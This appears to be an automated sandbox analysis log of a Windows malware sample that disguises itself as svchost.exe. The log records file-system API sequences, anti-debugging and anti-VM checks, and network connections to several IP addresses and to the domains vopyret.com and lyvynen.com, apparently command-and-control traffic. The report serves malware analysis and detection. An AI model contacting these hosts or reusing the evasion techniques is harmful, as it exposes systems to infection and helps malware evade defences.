Source: C:\Windows\apppatch\svchost.exe TID: 3232Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02C97CE0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,2_2_02C9BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01437CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_01437CE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0143BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,5_2_0143BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014166D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_014166D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013A7CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_013A7CE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013ABE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,6_2_013ABE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013866D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_013866D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0323BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,10_2_0323BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032166D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,10_2_032166D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03237CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,10_2_03237CE0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02C9C3DB
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632465085.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522994867.000000000088E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
Source: WlCVLbzNph.exe, 00000000.00000002.1442316835.000000000055E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~,windows\system\vmhgfs.DLL
Source: svchost.exe, 00000002.00000003.1590750488.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085108104.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744102773.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644497267.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2686660345.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867489246.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916019687.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.2682996200.0000000000826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSz
Source: svchost.exe, 00000002.00000003.1499108924.000000000088C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00401A30 rdtsc 0_2_00401A30
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014264A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_014264A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00401FC0
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]2_2_00406800
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1360 mov eax, dword ptr fs:[00000030h]2_2_029A1360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1360 mov edx, dword ptr fs:[00000030h]2_2_029A1360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1000 mov eax, dword ptr fs:[00000030h]2_2_029A1000
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01201360 mov eax, dword ptr fs:[00000030h]5_2_01201360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01201360 mov edx, dword ptr fs:[00000030h]5_2_01201360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01201000 mov eax, dword ptr fs:[00000030h]5_2_01201000
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01321360 mov eax, dword ptr fs:[00000030h]6_2_01321360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01321360 mov edx, dword ptr fs:[00000030h]6_2_01321360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01321000 mov eax, dword ptr fs:[00000030h]6_2_01321000
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03071360 mov eax, dword ptr fs:[00000030h]10_2_03071360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03071360 mov edx, dword ptr fs:[00000030h]10_2_03071360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03071000 mov eax, dword ptr fs:[00000030h]10_2_03071000
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_004010A0 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,ReadFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,0_2_004010A0

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vopyret.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lyvynen.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 75.2.71.199 443Jump to behavior
